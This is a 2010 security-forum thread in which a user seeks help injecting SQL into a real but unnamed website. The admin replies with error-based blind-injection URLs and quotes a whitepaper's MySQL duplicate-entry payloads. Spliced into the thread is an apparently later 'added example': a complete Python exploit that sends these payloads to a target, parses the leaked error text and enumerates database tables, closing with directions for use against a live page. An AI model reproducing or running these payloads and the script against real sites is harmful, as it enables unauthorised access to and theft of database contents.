Waraxe IT Security Portal
www.waraxe.us Forum Index -> Sql injection
Help in Sql injection plizz
Posted: Mon Sep 06, 2010 1:48 am
pink_spider
Advanced user
Joined: Aug 28, 2010
Posts: 91

Code:
http://www.site.com/index.php?id=2773+order+by+1,2,3,4,5,6--


It is OK,
but UNION fails :(

Code:
http://www.site.com/index.php?id=2773 UNION all SELECT 1,2,3,4,5,6--


The error is:

Code:

Error executing SQL!
mysql error: [1222: The used SELECT statements have a different number of columns] in EXECUTE("SELECT l.*, lo.*, DATE_FORMAT(l.licitacao_data_abertura,'%d/%m/%Y') as licitacao_data_abertura FROM swp_licitacoes l inner join swp_secoes lo on l.secoes_id = lo.secoes_id WHERE l.licitacao_id = 2773 UNION all SELECT version(),version(),version(),version(),version(),version()-- LIMIT 18446744073709551615")


HELP ME PLEASE
Posted: Mon Sep 06, 2010 11:49 am
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

This situation is common: the vulnerable GET/POST parameter is used in multiple SQL queries with different column counts. So even if you get the count right for the first SQL query, the second query will still fail.
My suggestion is error-based SQL injection:

Code:

http://www.site.com/index.php?id=2772%2b(IF(LENGTH(version())>1,(SELECT+1+UNION+ALL+SELECT+1),1))


Code:

http://www.site.com/index.php?id=2772%2b(IF(LENGTH(version())>91,(SELECT+1+UNION+ALL+SELECT+1),1))


Some more useful information:

http://www.ptsecurity.com/download/PT-devteev-FAST-blind-SQL-Injection.pdf
Posted: Mon Sep 06, 2010 9:59 pm
pink_spider
Advanced user
Joined: Aug 28, 2010
Posts: 91

Very good! Thanks.

But my problems are not over!
I injected the second code and it worked! I think ¬ ¬

Code:

http://www.site.com//index.php?id=2772%2b(IF(LENGTH(version())>91,(SELECT+1+UNION+ALL+SELECT+1),1))


But nothing shows up on the page!
It did not show the SQL version; the output was indeed null.

How do I fix this problem?
And, if it is not asking too much, I would like the code I posted explained!

I thank you!

Posted: Mon Sep 06, 2010 10:13 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

Did you get an error message like this:

Code:

Subquery returns more than 1 row


It's blind injection; you can retrieve information one bit at a time.
And you need special software for exploitation, because the manual way is too error-prone and too time-consuming.
If you know PHP, Perl, Ruby, Java or another programming language, then it's not hard to write the needed script or program.
Or try the methods from the whitepaper suggested above; it may give you easier ways to exploit this.
Posted: Mon Sep 06, 2010 10:16 pm
pink_spider
Advanced user
Joined: Aug 28, 2010
Posts: 91

Can I post the website address that contains the vulnerability, or is that prohibited by the forum?
Posted: Mon Sep 06, 2010 10:18 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

pink_spider wrote:
Can I post the website address that contains the vulnerability, or is that prohibited by the forum?

Nope, don't post sensitive information to this forum.
Posted: Mon Sep 06, 2010 10:23 pm
pink_spider
Advanced user
Joined: Aug 28, 2010
Posts: 91

OK!
Thanks anyway.

ORDER BY gives an error on two columns,

column no. 6 and no. 26.
I selected up to 500.

What happens then?
Posted: Mon Sep 06, 2010 10:29 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

Did you read the whitepaper I was suggesting?

http://www.ptsecurity.com/download/PT-devteev-FAST-blind-SQL-Injection.pdf

Code:

[ 2 ] ERROR-BASED BLIND SQL INJECTION IN MYSQL
At the turn of the last year, Qwazar obtained a universal technique for exploiting Blind SQL Injection vulnerabilities in applications running on the MySQL database from the depths of forum.antichat.ru (I wonder what else can be found in those depths). It should be mentioned that the proposed technique is rather complicated and opaque. Here is an example of applying this universal approach to MySQL >= 5.0:

mysql> select 1,2 union select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x;
ERROR 1062 (23000): Duplicate entry '5.0.841' for key 1
mysql> select 1 and (select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.0.841' for key 1

If the table name is unknown, which is possible for MySQL < 5.0, then one has to use more complex queries based on the function rand(). This means that we will often fail to obtain the necessary data with a single HTTP query.
mysql> select 1 and row(1,1)>(select count(*),concat(version(),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1);
...
1 row in set (0.00 sec)
...
mysql> select 1 and row(1,1)>(select count(*),concat(version(),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1);
ERROR 1062 (23000): Duplicate entry '5.0.84:0' for key 1
Here is an example of practical use of the method for database structure restoration:
http://server/?id=(1)and(select+1+from(select+count(*),concat((select+table_name+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--
http://server/?id=(1)and(select+1+from(select+count(*),concat((select+table_name+from+information_schema.tables+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--


Analyze that information and do some local tests on your home computer before going online.
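The duplicate-entry technique quoted above, turned into a small Python client as an added example; it is not code from the thread or from the PT Security paper. It builds the paper's `(1)and(select 1 from(...)a)` payload with `0x7e7e` marker bytes on both sides of the leaked value so the value can be cut out of the error text reliably, and walks `information_schema.tables` with `LIMIT n,1` until a request comes back without the error. The target URL and parameter are the thread's placeholders; `ConstructedServer` is a made-up stand-in that returns the error text MySQL prints, for a short invented table list, so the script runs offline. Caveats a practitioner should keep in mind: the trick needs the source table to have at least three rows (`information_schema.tables` always does), `rand(0)` is used rather than `rand()` because its sequence is fixed and the error therefore fires on every request, the MySQL error must actually be echoed by the page, and the value shown in the message can be cut off for long strings, in which case fetch it in slices with `MID()`.

```python
"""Leaking values through MySQL error 1062 (added example, not from the thread).

Payload shape (from the PT Security paper quoted in the thread):
  (1)and(select 1 from(select count(*),concat(<value>,floor(rand(0)*2))x
         from information_schema.tables group by x)a)
rand(0) yields a fixed 0,1,1,0,1,1,... sequence, so with three or more source
rows the GROUP BY temporary table is asked to insert a key it already holds and
MySQL aborts with  Duplicate entry '<value>1' for key ...  exposing <value>.
"""
import re
import urllib.parse
import urllib.request

BASE_URL = "http://www.site.com/index.php"   # hypothetical target, as in the thread
PARAM = "id"
MARK = "0x7e7e"                               # renders as '~~' in the error text
LEAK_RE = re.compile(r"Duplicate entry '~~(.*?)~~")


def group_by_payload(leak_expr: str) -> str:
    """Wrap a scalar SQL expression in the duplicate-key oracle, with markers around it."""
    return (
        "(1)and(select 1 from(select count(*),"
        f"concat({MARK},({leak_expr}),{MARK},floor(rand(0)*2))x "
        "from information_schema.tables group by x)a)"
    )


def table_name_expr(offset: int) -> str:
    """Scalar subselect for the offset-th table name, as in the paper's example URLs."""
    return f"select table_name from information_schema.tables limit {offset},1"


def build_url(leak_expr: str) -> str:
    return f"{BASE_URL}?{PARAM}=" + urllib.parse.quote(group_by_payload(leak_expr), safe="(),")


def http_fetch(url: str) -> str:
    """Live fetch (not exercised offline); the page must echo the MySQL error."""
    with urllib.request.urlopen(url, timeout=10) as resp:
        return resp.read().decode("utf-8", "replace")


def parse_leak(body: str):
    """Value between the markers in an error page, or None if no error was raised."""
    m = LEAK_RE.search(body)
    return m.group(1) if m else None


def enumerate_tables(fetch, max_rows: int = 500) -> list:
    """One request per table name; stops at the first response without the error
    (a LIMIT offset past the last row makes the subselect NULL, so no duplicate key)."""
    names = []
    for offset in range(max_rows):
        name = parse_leak(fetch(build_url(table_name_expr(offset))))
        if name is None:
            break
        names.append(name)
    return names


class ConstructedServer:
    """Offline stand-in for the vulnerable page (constructed for this example).
    It reads the LIMIT offset out of the payload, looks it up in an invented table
    list and returns the error text MySQL would print, or a plain page."""

    TABLES = ["swp_licitacoes", "swp_secoes"]   # names taken from the thread's error output

    def __init__(self):
        self.requests = 0

    def fetch(self, url: str) -> str:
        self.requests += 1
        m = re.search(r"limit (\d+),1", urllib.parse.unquote(url))
        if m and int(m.group(1)) < len(self.TABLES):
            return ("Error executing SQL!\nmysql error: [1062: Duplicate entry "
                    f"'~~{self.TABLES[int(m.group(1))]}~~1' for key 'group_key']")
        return "<html>normal page</html>"


if __name__ == "__main__":
    srv = ConstructedServer()
    print("example request:", build_url("version()"))
    print("tables:", enumerate_tables(srv.fetch), "in", srv.requests, "requests")
```

Against a live page, call `enumerate_tables(http_fetch)`; to leak any other scalar, pass its expression to `build_url` directly and run the body through `parse_leak`.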
Posted: Mon Sep 06, 2010 10:37 pm
pink_spider
Advanced user
Joined: Aug 28, 2010
Posts: 91

OK,
thank you!
All times are GMT
Powered by phpBB © 2001-2008 phpBB Group
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2020 Janek Vind "waraxe"